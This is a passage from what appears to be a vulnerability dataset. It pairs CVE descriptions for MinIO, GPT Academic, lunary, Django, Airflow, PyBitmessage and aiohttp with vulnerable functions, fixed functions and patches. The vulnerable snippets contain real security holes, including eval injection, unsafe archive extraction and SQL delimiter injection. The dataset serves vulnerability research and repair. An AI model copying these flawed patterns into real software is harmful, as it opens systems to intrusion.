r.URL)\n\t\treturn\n\t}\n\n\tif r.ContentLength > maxEConfigJSONSize || r.ContentLength == -1 {\n\t\t// More than maxConfigSize bytes were available\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigTooLarge), r.URL)\n\t\treturn\n\t}\n\n\tpassword := cred.SecretKey\n\tconfigBytes, err := madmin.DecryptData(password, io.LimitReader(r.Body, r.ContentLength))\n\tif err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigBadJSON), r.URL)\n\t\treturn\n\t}\n\n\tvar ureq madmin.AddOrUpdateUserReq\n\tif err = json.Unmarshal(configBytes, &ureq); err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigBadJSON), r.URL)\n\t\treturn\n\t}\n\n\tupdatedAt, err := globalIAMSys.CreateUser(ctx, accessKey, ureq)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\tlogger.LogIf(ctx, globalSiteReplicationSys.IAMChangeHook(ctx, madmin.SRIAMItem{\n\t\tType: madmin.SRIAMItemIAMUser,\n\t\tIAMUser: &madmin.SRIAMUser{\n\t\t\tAccessKey: accessKey,\n\t\t\tIsDeleteReq: false,\n\t\t\tUserReq: &ureq,\n\t\t},\n\t\tUpdatedAt: updatedAt,\n\t}))\n}"}], "fix_func": [{"id": "fix_go_92_1", "commit": "c7f7e67", "file_path": "cmd/admin-handlers-users.go", "start_line": "412", "end_line": "516", "snippet": "func (a adminAPIHandlers) AddUser(w http.ResponseWriter, r *http.Request) {\n\tctx := newContext(r, w, \"AddUser\")\n\n\tdefer logger.AuditLog(ctx, w, r, mustGetClaimsFromToken(r))\n\n\tvars := mux.Vars(r)\n\taccessKey := vars[\"accessKey\"]\n\n\t// Get current object layer instance.\n\tobjectAPI := newObjectLayerFn()\n\tif objectAPI == nil || globalNotificationSys == nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrServerNotInitialized), r.URL)\n\t\treturn\n\t}\n\n\tcred, owner, s3Err := validateAdminSignature(ctx, r, \"\")\n\tif s3Err != ErrNone {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(s3Err), r.URL)\n\t\treturn\n\t}\n\n\t// Not allowed to add a user with same access key as root credential\n\tif accessKey == globalActiveCred.AccessKey {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tuser, exists := globalIAMSys.GetUser(ctx, accessKey)\n\tif exists && (user.Credentials.IsTemp() || user.Credentials.IsServiceAccount()) {\n\t\t// Updating STS credential is not allowed, and this API does not\n\t\t// support updating service accounts.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tif (cred.IsTemp() || cred.IsServiceAccount()) && cred.ParentUser == accessKey {\n\t\t// Incoming access key matches parent user then we should\n\t\t// reject password change requests.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\t// Check if accessKey has beginning and end space characters, this only applies to new users.\n\tif !exists && hasSpaceBE(accessKey) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminResourceInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tcheckDenyOnly := false\n\tif accessKey == cred.AccessKey {\n\t\t// Check that there is no explicit deny - otherwise it's allowed\n\t\t// to change one's own password.\n\t\tcheckDenyOnly = true\n\t}\n\n\tif !globalIAMSys.IsAllowed(iampolicy.Args{\n\t\tAccountName: cred.AccessKey,\n\t\tGroups: cred.Groups,\n\t\tAction: iampolicy.CreateUserAdminAction,\n\t\tConditionValues: getConditionValues(r, \"\", cred),\n\t\tIsOwner: owner,\n\t\tClaims: cred.Claims,\n\t\tDenyOnly: checkDenyOnly,\n\t}) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n\t\treturn\n\t}\n\n\tif r.ContentLength > maxEConfigJSONSize || r.ContentLength == -1 {\n\t\t// More than maxConfigSize bytes were available\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigTooLarge), r.URL)\n\t\treturn\n\t}\n\n\tpassword := cred.SecretKey\n\tconfigBytes, err := madmin.DecryptData(password, io.LimitReader(r.Body, r.ContentLength))\n\tif err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigBadJSON), r.URL)\n\t\treturn\n\t}\n\n\tvar ureq madmin.AddOrUpdateUserReq\n\tif err = json.Unmarshal(configBytes, &ureq); err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminConfigBadJSON), r.URL)\n\t\treturn\n\t}\n\n\tupdatedAt, err := globalIAMSys.CreateUser(ctx, accessKey, ureq)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\tlogger.LogIf(ctx, globalSiteReplicationSys.IAMChangeHook(ctx, madmin.SRIAMItem{\n\t\tType: madmin.SRIAMItemIAMUser,\n\t\tIAMUser: &madmin.SRIAMUser{\n\t\t\tAccessKey: accessKey,\n\t\t\tIsDeleteReq: false,\n\t\t\tUserReq: &ureq,\n\t\t},\n\t\tUpdatedAt: updatedAt,\n\t}))\n}"}], "vul_patch": "--- a/cmd/admin-handlers-users.go\n+++ b/cmd/admin-handlers-users.go\n@@ -20,7 +20,7 @@\n \t}\n \n \t// Not allowed to add a user with same access key as root credential\n-\tif owner && accessKey == cred.AccessKey {\n+\tif accessKey == globalActiveCred.AccessKey {\n \t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n \t\treturn\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-25185", "cve_description": "GPT Academic provides interactive interfaces for large language models. In 3.91 and earlier, GPT Academic does not properly account for soft links. An attacker can create a malicious file as a soft link pointing to a target file, then package this soft link file into a tar.gz file and upload it. Subsequently, when accessing the decompressed file from the server, the soft link will point to the target file on the victim server. The vulnerability allows attackers to read all files on the server.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/binary-husky/gpt_academic", "patch_url": ["https://github.com/binary-husky/gpt_academic/commit/5dffe8627f681d7006cebcba27def038bb691949"], "programing_language": "Python", "vul_func": [{"id": "vul_py_402_1", "commit": "2aefef26db62efd0b684f3c3f35c77432e54afff", "file_path": "shared_utils/handle_upload.py", "start_line": 91, "end_line": 157, "snippet": "def extract_archive(file_path, dest_dir):\n import zipfile\n import tarfile\n import os\n\n # Get the file extension of the input file\n file_extension = os.path.splitext(file_path)[1]\n\n # Extract the archive based on its extension\n if file_extension == \".zip\":\n with zipfile.ZipFile(file_path, \"r\") as zipobj:\n zipobj._extract_member = lambda a,b,c: zip_extract_member_new(zipobj, a,b,c) # \\u4fee\\u590d\\u4e2d\\u6587\\u4e71\\u7801\\u7684\\u95ee\\u9898\n zipobj.extractall(path=dest_dir)\n logger.info(\"Successfully extracted zip archive to {}\".format(dest_dir))\n\n elif file_extension in [\".tar\", \".gz\", \".bz2\"]:\n try:\n with tarfile.open(file_path, \"r:*\") as tarobj:\n # \\u6e05\\u7406\\u63d0\\u53d6\\u8def\\u5f84\\uff0c\\u79fb\\u9664\\u4efb\\u4f55\\u4e0d\\u5b89\\u5168\\u7684\\u5143\\u7d20\n for member in tarobj.getmembers():\n member_path = os.path.normpath(member.name)\n full_path = os.path.join(dest_dir, member_path)\n full_path = os.path.abspath(full_path)\n if member.islnk() or member.issym():\n raise Exception(f\"Attempted Symlink in {member.name}\")\n if not full_path.startswith(os.path.abspath(dest_dir) + os.sep):\n raise Exception(f\"Attempted Path Traversal in {member.name}\")\n\n tarobj.extractall(path=dest_dir)\n logger.info(\"Successfully extracted tar archive to {}\".format(dest_dir))\n except tarfile.ReadError as e:\n if file_extension == \".gz\":\n # \\u4e00\\u4e9b\\u7279\\u522b\\u5947\\u8469\\u7684\\u9879\\u76ee\\uff0c\\u662f\\u4e00\\u4e2agz\\u6587\\u4ef6\\uff0c\\u91cc\\u9762\\u4e0d\\u662ftar\\uff0c\\u53ea\\u6709\\u4e00\\u4e2atex\\u6587\\u4ef6\n import gzip\n with gzip.open(file_path, 'rb') as f_in:\n with open(os.path.join(dest_dir, 'main.tex'), 'wb') as f_out:\n f_out.write(f_in.read())\n else:\n raise e\n\n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install rarfile\n # \\u6b64\\u5916\\uff0cWindows\\u4e0a\\u8fd8\\u9700\\u8981\\u5b89\\u88c5winrar\\u8f6f\\u4ef6\\uff0c\\u914d\\u7f6e\\u5176Path\\u73af\\u5883\\u53d8\\u91cf\\uff0c\\u5982\"C:\\Program Files\\WinRAR\"\\u624d\\u53ef\\u4ee5\n elif file_extension == \".rar\":\n try:\n import rarfile\n\n with rarfile.RarFile(file_path) as rf:\n rf.extractall(path=dest_dir)\n logger.info(\"Successfully extracted rar archive to {}\".format(dest_dir))\n except:\n logger.info(\"Rar format requires additional dependencies to install\")\n return \"\\n\\n\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install rarfile\\u6765\\u89e3\\u538brar\\u6587\\u4ef6\\u3002\\u5efa\\u8bae\\uff1a\\u4f7f\\u7528zip\\u538b\\u7f29\\u683c\\u5f0f\\u3002\"\n\n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install py7zr\n elif file_extension == \".7z\":\n try:\n import py7zr\n\n with py7zr.SevenZipFile(file_path, mode=\"r\") as f:\n f.extractall(path=dest_dir)\n logger.info(\"Successfully extracted 7z archive to {}\".format(dest_dir))\n except:\n logger.info(\"7z format requires additional dependencies to install\")\n return \"\\n\\n\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install py7zr\\u6765\\u89e3\\u538b7z\\u6587\\u4ef6\"\n else:\n return \"\"\n return \"\""}], "fix_func": [{"id": "fix_py_402_1", "commit": "5dffe8627f681d7006cebcba27def038bb691949", "file_path": "shared_utils/handle_upload.py", "start_line": 117, "end_line": 180, "snippet": "def extract_archive(file_path, dest_dir):\n import zipfile\n import tarfile\n import os\n\n # Get the file extension of the input file\n file_extension = os.path.splitext(file_path)[1]\n\n # Extract the archive based on its extension\n if file_extension == \".zip\":\n with zipfile.ZipFile(file_path, \"r\") as zipobj:\n zipobj._extract_member = lambda a,b,c: zip_extract_member_new(zipobj, a,b,c) # \\u4fee\\u590d\\u4e2d\\u6587\\u4e71\\u7801\\u7684\\u95ee\\u9898\n zipobj.extractall(path=dest_dir)\n logger.info(\"Successfully extracted zip archive to {}\".format(dest_dir))\n\n elif file_extension in [\".tar\", \".gz\", \".bz2\"]:\n try:\n with tarfile.open(file_path, \"r:*\") as tarobj:\n # \\u6e05\\u7406\\u63d0\\u53d6\\u8def\\u5f84\\uff0c\\u79fb\\u9664\\u4efb\\u4f55\\u4e0d\\u5b89\\u5168\\u7684\\u5143\\u7d20\n for member in tarobj.getmembers():\n member_path = os.path.normpath(member.name)\n full_path = os.path.join(dest_dir, member_path)\n full_path = os.path.abspath(full_path)\n if member.islnk() or member.issym():\n raise Exception(f\"Attempted Symlink in {member.name}\")\n if not full_path.startswith(os.path.abspath(dest_dir) + os.sep):\n raise Exception(f\"Attempted Path Traversal in {member.name}\")\n\n tarobj.extractall(path=dest_dir)\n logger.info(\"Successfully extracted tar archive to {}\".format(dest_dir))\n except tarfile.ReadError as e:\n if file_extension == \".gz\":\n # \\u4e00\\u4e9b\\u7279\\u522b\\u5947\\u8469\\u7684\\u9879\\u76ee\\uff0c\\u662f\\u4e00\\u4e2agz\\u6587\\u4ef6\\uff0c\\u91cc\\u9762\\u4e0d\\u662ftar\\uff0c\\u53ea\\u6709\\u4e00\\u4e2atex\\u6587\\u4ef6\n import gzip\n with gzip.open(file_path, 'rb') as f_in:\n with open(os.path.join(dest_dir, 'main.tex'), 'wb') as f_out:\n f_out.write(f_in.read())\n else:\n raise e\n\n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install rarfile\n # \\u6b64\\u5916\\uff0cWindows\\u4e0a\\u8fd8\\u9700\\u8981\\u5b89\\u88c5winrar\\u8f6f\\u4ef6\\uff0c\\u914d\\u7f6e\\u5176Path\\u73af\\u5883\\u53d8\\u91cf\\uff0c\\u5982\"C:\\Program Files\\WinRAR\"\\u624d\\u53ef\\u4ee5\n elif file_extension == \".rar\":\n try:\n import rarfile # \\u7528\\u6765\\u68c0\\u67e5rarfile\\u662f\\u5426\\u5b89\\u88c5\\uff0c\\u4e0d\\u8981\\u5220\\u9664\n safe_extract_rar(file_path, dest_dir)\n except:\n logger.info(\"Rar format requires additional dependencies to install\")\n return \"

\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install rarfile\\u6765\\u89e3\\u538brar\\u6587\\u4ef6\\u3002\\u5efa\\u8bae\\uff1a\\u4f7f\\u7528zip\\u538b\\u7f29\\u683c\\u5f0f\\u3002\"\n\n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install py7zr\n elif file_extension == \".7z\":\n try:\n import py7zr\n\n with py7zr.SevenZipFile(file_path, mode=\"r\") as f:\n f.extractall(path=dest_dir)\n logger.info(\"Successfully extracted 7z archive to {}\".format(dest_dir))\n except:\n logger.info(\"7z format requires additional dependencies to install\")\n return \"

\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install py7zr\\u6765\\u89e3\\u538b7z\\u6587\\u4ef6\"\n else:\n return \"\"\n return \"\""}], "vul_patch": "--- a/shared_utils/handle_upload.py\n+++ b/shared_utils/handle_upload.py\n@@ -42,14 +42,11 @@\n # \\u6b64\\u5916\\uff0cWindows\\u4e0a\\u8fd8\\u9700\\u8981\\u5b89\\u88c5winrar\\u8f6f\\u4ef6\\uff0c\\u914d\\u7f6e\\u5176Path\\u73af\\u5883\\u53d8\\u91cf\\uff0c\\u5982\"C:\\Program Files\\WinRAR\"\\u624d\\u53ef\\u4ee5\n elif file_extension == \".rar\":\n try:\n- import rarfile\n-\n- with rarfile.RarFile(file_path) as rf:\n- rf.extractall(path=dest_dir)\n- logger.info(\"Successfully extracted rar archive to {}\".format(dest_dir))\n+ import rarfile # \\u7528\\u6765\\u68c0\\u67e5rarfile\\u662f\\u5426\\u5b89\\u88c5\\uff0c\\u4e0d\\u8981\\u5220\\u9664\n+ safe_extract_rar(file_path, dest_dir)\n except:\n logger.info(\"Rar format requires additional dependencies to install\")\n- return \"\\n\\n\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install rarfile\\u6765\\u89e3\\u538brar\\u6587\\u4ef6\\u3002\\u5efa\\u8bae\\uff1a\\u4f7f\\u7528zip\\u538b\\u7f29\\u683c\\u5f0f\\u3002\"\n+ return \"

\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install rarfile\\u6765\\u89e3\\u538brar\\u6587\\u4ef6\\u3002\\u5efa\\u8bae\\uff1a\\u4f7f\\u7528zip\\u538b\\u7f29\\u683c\\u5f0f\\u3002\"\n \n # \\u7b2c\\u4e09\\u65b9\\u5e93\\uff0c\\u9700\\u8981\\u9884\\u5148pip install py7zr\n elif file_extension == \".7z\":\n@@ -61,7 +58,7 @@\n logger.info(\"Successfully extracted 7z archive to {}\".format(dest_dir))\n except:\n logger.info(\"7z format requires additional dependencies to install\")\n- return \"\\n\\n\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install py7zr\\u6765\\u89e3\\u538b7z\\u6587\\u4ef6\"\n+ return \"

\\u89e3\\u538b\\u5931\\u8d25! \\u9700\\u8981\\u5b89\\u88c5pip install py7zr\\u6765\\u89e3\\u538b7z\\u6587\\u4ef6\"\n else:\n return \"\"\n return \"\"\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-7472", "cve_description": "lunary-ai/lunary v1.2.26 contains an email injection vulnerability in the Send email verification API (/v1/users/send-verification) and Sign up API (/auth/signup). An unauthenticated attacker can inject data into outgoing emails by bypassing the extractFirstName function using a different whitespace character (e.g., \\xa0). This vulnerability can be exploited to conduct phishing attacks, damage the application's brand, cause legal and compliance issues, and result in financial impact due to unauthorized email usage.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/lunary-ai/lunary", "patch_url": ["https://github.com/lunary-ai/lunary/commit/a39837d7c49936a0c435d241f37ca2ea7904d2cd"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_139_1", "commit": "35afd4439464571eb016318cd7b6f85a162225ca", "file_path": "packages/backend/src/utils/emails.ts", "start_line": 4, "end_line": 7, "snippet": "function extractFirstName(name: string) {\n if (!name) return \"there\"\n return name.split(\" \")[0]\n}"}], "fix_func": [{"id": "fix_js_139_1", "commit": "a39837d7c49936a0c435d241f37ca2ea7904d2cd", "file_path": "packages/backend/src/utils/emails.ts", "start_line": 4, "end_line": 12, "snippet": "function sanitizeName(name: string): string {\n return name.replace(/\\s+/g, \" \").trim()\n}\n\nfunction extractFirstName(name: string): string {\n if (!name) return \"there\"\n const sanitizedName = sanitizeName(name)\n return sanitizedName.split(\" \")[0]\n}"}], "vul_patch": "--- a/packages/backend/src/utils/emails.ts\n+++ b/packages/backend/src/utils/emails.ts\n@@ -1,4 +1,9 @@\n-function extractFirstName(name: string) {\n+function sanitizeName(name: string): string {\n+ return name.replace(/\\s+/g, \" \").trim()\n+}\n+\n+function extractFirstName(name: string): string {\n if (!name) return \"there\"\n- return name.split(\" \")[0]\n+ const sanitizedName = sanitizeName(name)\n+ return sanitizedName.split(\" \")[0]\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-7471", "cve_description": "Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3 allows SQL Injection if untrusted data is used as a StringAgg delimiter (e.g., in Django applications that offer downloads of data as a series of rows with a user-specified column delimiter). By passing a suitably crafted delimiter to a contrib.postgres.aggregates.StringAgg instance, it was possible to break escaping and inject malicious SQL.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/eb31d845323618d688ad429479c6dda973056136", "https://github.com/django/django/commit/001b0634cd309e372edb6d7d95d083d02b8e37bd", "https://github.com/django/django/commit/505826b469b16ab36693360da9e11fd13213421b", "https://github.com/django/django/commit/c67a368c16e4680b324b4f385398d638db4d8147"], "programing_language": "Python", "vul_func": [{"id": "vul_py_206_1", "commit": "6b178a3", "file_path": "django/contrib/postgres/aggregates/general.py", "start_line": 52, "end_line": 63, "snippet": "class StringAgg(OrderableAggMixin, Aggregate):\n function = 'STRING_AGG'\n template = \"%(function)s(%(distinct)s%(expressions)s, '%(delimiter)s'%(ordering)s)\"\n allow_distinct = True\n\n def __init__(self, expression, delimiter, **extra):\n super().__init__(expression, delimiter=delimiter, **extra)\n\n def convert_value(self, value, expression, connection):\n if not value:\n return ''\n return value"}], "fix_func": [{"id": "fix_py_206_1", "commit": "eb31d84", "file_path": "django/contrib/postgres/aggregates/general.py", "start_line": 53, "end_line": 65, "snippet": "class StringAgg(OrderableAggMixin, Aggregate):\n function = 'STRING_AGG'\n template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'\n allow_distinct = True\n\n def __init__(self, expression, delimiter, **extra):\n delimiter_expr = Value(str(delimiter))\n super().__init__(expression, delimiter_expr, **extra)\n\n def convert_value(self, value, expression, connection):\n if not value:\n return ''\n return value"}], "vul_patch": "--- a/django/contrib/postgres/aggregates/general.py\n+++ b/django/contrib/postgres/aggregates/general.py\n@@ -1,10 +1,11 @@\n class StringAgg(OrderableAggMixin, Aggregate):\n function = 'STRING_AGG'\n- template = \"%(function)s(%(distinct)s%(expressions)s, '%(delimiter)s'%(ordering)s)\"\n+ template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'\n allow_distinct = True\n \n def __init__(self, expression, delimiter, **extra):\n- super().__init__(expression, delimiter=delimiter, **extra)\n+ delimiter_expr = Value(str(delimiter))\n+ super().__init__(expression, delimiter_expr, **extra)\n \n def convert_value(self, value, expression, connection):\n if not value:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-43985", "cve_description": "In Apache Airflow versions prior to 2.4.2, there was an open redirect in the webserver's `/confirm` endpoint.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/9fb4814d29d934cef3b02fb3b2547f9fb76aaa97"], "programing_language": "Python", "vul_func": [{"id": "vul_go_177_1", "commit": "2987801", "file_path": "airflow/www/views.py", "start_line": 156, "end_line": 178, "snippet": "def get_safe_url(url):\n \"\"\"Given a user-supplied URL, ensure it points to our web server\"\"\"\n valid_schemes = ['http', 'https', '']\n valid_netlocs = [request.host, '']\n\n if not url:\n return url_for('Airflow.index')\n\n parsed = urlparse(url)\n\n # If the url contains semicolon, redirect it to homepage to avoid\n # potential XSS. (Similar to https://github.com/python/cpython/pull/24297/files (bpo-42967))\n if ';' in unquote(url):\n return url_for('Airflow.index')\n\n query = parse_qsl(parsed.query, keep_blank_values=True)\n\n url = parsed._replace(query=urlencode(query)).geturl()\n\n if parsed.scheme in valid_schemes and parsed.netloc in valid_netlocs:\n return url\n\n return url_for('Airflow.index')"}], "fix_func": [{"id": "fix_go_177_1", "commit": "9fb4814", "file_path": "airflow/www/views.py", "start_line": 156, "end_line": 172, "snippet": "def get_safe_url(url):\n \"\"\"Given a user-supplied URL, ensure it points to our web server\"\"\"\n if not url:\n return url_for('Airflow.index')\n\n # If the url contains semicolon, redirect it to homepage to avoid\n # potential XSS. (Similar to https://github.com/python/cpython/pull/24297/files (bpo-42967))\n if ';' in unquote(url):\n return url_for('Airflow.index')\n\n host_url = urlsplit(request.host_url)\n redirect_url = urlsplit(urljoin(request.host_url, url))\n if not (redirect_url.scheme in (\"http\", \"https\") and host_url.netloc == redirect_url.netloc):\n return url_for('Airflow.index')\n\n # This will ensure we only redirect to the right scheme/netloc\n return redirect_url.geturl()"}], "vul_patch": "--- a/airflow/www/views.py\n+++ b/airflow/www/views.py\n@@ -1,23 +1,17 @@\n def get_safe_url(url):\n \"\"\"Given a user-supplied URL, ensure it points to our web server\"\"\"\n- valid_schemes = ['http', 'https', '']\n- valid_netlocs = [request.host, '']\n-\n if not url:\n return url_for('Airflow.index')\n-\n- parsed = urlparse(url)\n \n # If the url contains semicolon, redirect it to homepage to avoid\n # potential XSS. (Similar to https://github.com/python/cpython/pull/24297/files (bpo-42967))\n if ';' in unquote(url):\n return url_for('Airflow.index')\n \n- query = parse_qsl(parsed.query, keep_blank_values=True)\n+ host_url = urlsplit(request.host_url)\n+ redirect_url = urlsplit(urljoin(request.host_url, url))\n+ if not (redirect_url.scheme in (\"http\", \"https\") and host_url.netloc == redirect_url.netloc):\n+ return url_for('Airflow.index')\n \n- url = parsed._replace(query=urlencode(query)).geturl()\n-\n- if parsed.scheme in valid_schemes and parsed.netloc in valid_netlocs:\n- return url\n-\n- return url_for('Airflow.index')\n+ # This will ensure we only redirect to the right scheme/netloc\n+ return redirect_url.geturl()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-1000070", "cve_description": "Bitmessage PyBitmessage version v0.6.2 (and introduced in or after commit 8ce72d8d2d25973b7064b1cf76a6b0b3d62f0ba0) contains a Eval injection vulnerability in main program, file src/messagetypes/__init__.py function constructObject that can result in Code Execution. This attack appears to be exploitable via remote attacker using a malformed message which must be processed by the victim - e.g. arrive from any sender on bitmessage network. This vulnerability appears to have been fixed in v0.6.3.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/Bitmessage/PyBitmessage", "patch_url": ["https://github.com/Bitmessage/PyBitmessage/commit/3a8016d31f517775d226aa8b902480f4a3a148a9"], "programing_language": "Python", "vul_func": [{"id": "vul_py_342_1", "commit": "96ea36cfd245f7dc10209b01278b5fa2970f360c", "file_path": "src/messagetypes/__init__.py", "start_line": 13, "end_line": 29, "snippet": "def constructObject(data):\n try:\n classBase = eval(data[\"\"] + \".\" + data[\"\"].title())\n except NameError:\n logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"])\n return None\n try:\n returnObj = classBase()\n returnObj.decode(data)\n except KeyError as e:\n logger.error(\"Missing mandatory key %s\", e)\n return None\n except:\n logger.error(\"classBase fail\", exc_info=True)\n return None\n else:\n return returnObj"}], "fix_func": [{"id": "fix_py_342_1", "commit": "3a8016d31f517775d226aa8b902480f4a3a148a9", "file_path": "src/messagetypes/__init__.py", "start_line": 13, "end_line": 30, "snippet": "def constructObject(data):\n try:\n m = import_module(\"messagetypes.\" + data[\"\"])\n classBase = getattr(m, data[\"\"].title())\n except (NameError, ImportError):\n logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"], exc_info=True)\n return None\n try:\n returnObj = classBase()\n returnObj.decode(data)\n except KeyError as e:\n logger.error(\"Missing mandatory key %s\", e)\n return None\n except:\n logger.error(\"classBase fail\", exc_info=True)\n return None\n else:\n return returnObj"}], "vul_patch": "--- a/src/messagetypes/__init__.py\n+++ b/src/messagetypes/__init__.py\n@@ -1,8 +1,9 @@\n def constructObject(data):\n try:\n- classBase = eval(data[\"\"] + \".\" + data[\"\"].title())\n- except NameError:\n- logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"])\n+ m = import_module(\"messagetypes.\" + data[\"\"])\n+ classBase = getattr(m, data[\"\"].title())\n+ except (NameError, ImportError):\n+ logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"], exc_info=True)\n return None\n try:\n returnObj = classBase()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-47641", "cve_description": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Affected versions of aiohttp have a security vulnerability regarding the inconsistent interpretation of the http protocol. HTTP/1.1 is a persistent protocol, if both Content-Length(CL) and Transfer-Encoding(TE) header values are present it can lead to incorrect interpretation of two entities that parse the HTTP and we can poison other sockets with this incorrect interpretation. A possible Proof-of-Concept (POC) would be a configuration with a reverse proxy(frontend) that accepts both CL and TE headers and aiohttp as backend. As aiohttp parses anything with chunked, we can pass a chunked123 as TE, the frontend entity will ignore this header and will parse Content-Length. The impact of this vulnerability is that it is possible to bypass any proxy rule, poisoning sockets to other users like passing Authentication Headers, also if it is present an Open Redirect an attacker could combine it to redirect random users to another website and log the request. This vulnerability has been addressed in release 3.8.0 of aiohttp. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-444": {"name": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", "description": "The product acts as an intermediary HTTP agent\n (such as a proxy or firewall) in the data flow between two\n entities such as a client and server, but it does not\n interpret malformed HTTP requests or responses in ways that\n are consistent with how the messages will be processed by\n those entities that are at the ultimate destination."}}, "repo": "https://github.com/aio-libs/aiohttp", "patch_url": ["https://github.com/aio-libs/aiohttp/commit/f016f0680e4ace6742b03a70cb0382ce86abe371"], "programing_language": "Python", "vul_func": [{"id": "vul_py_103_1", "commit": "a8f01d7", "file_path": "aiohttp/http_parser.py", "start_line": "456", "end_line": "495", "snippet": " def parse_headers(\n self, lines: List[bytes]\n ) -> Tuple[\n \"CIMultiDictProxy[str]\", RawHeaders, Optional[bool], Optional[str], bool, bool\n ]:\n \"\"\"Parses RFC 5322 headers from a stream.\n\n Line continuations are supported. Returns list of header name\n and value pairs. Header name is in upper case.\n \"\"\"\n headers, raw_headers = self._headers_parser.parse_headers(lines)\n close_conn = None\n encoding = None\n upgrade = False\n chunked = False\n\n # keep-alive\n conn = headers.get(hdrs.CONNECTION)\n if conn:\n v = conn.lower()\n if v == \"close\":\n close_conn = True\n elif v == \"keep-alive\":\n close_conn = False\n elif v == \"upgrade\":\n upgrade = True\n\n # encoding\n enc = 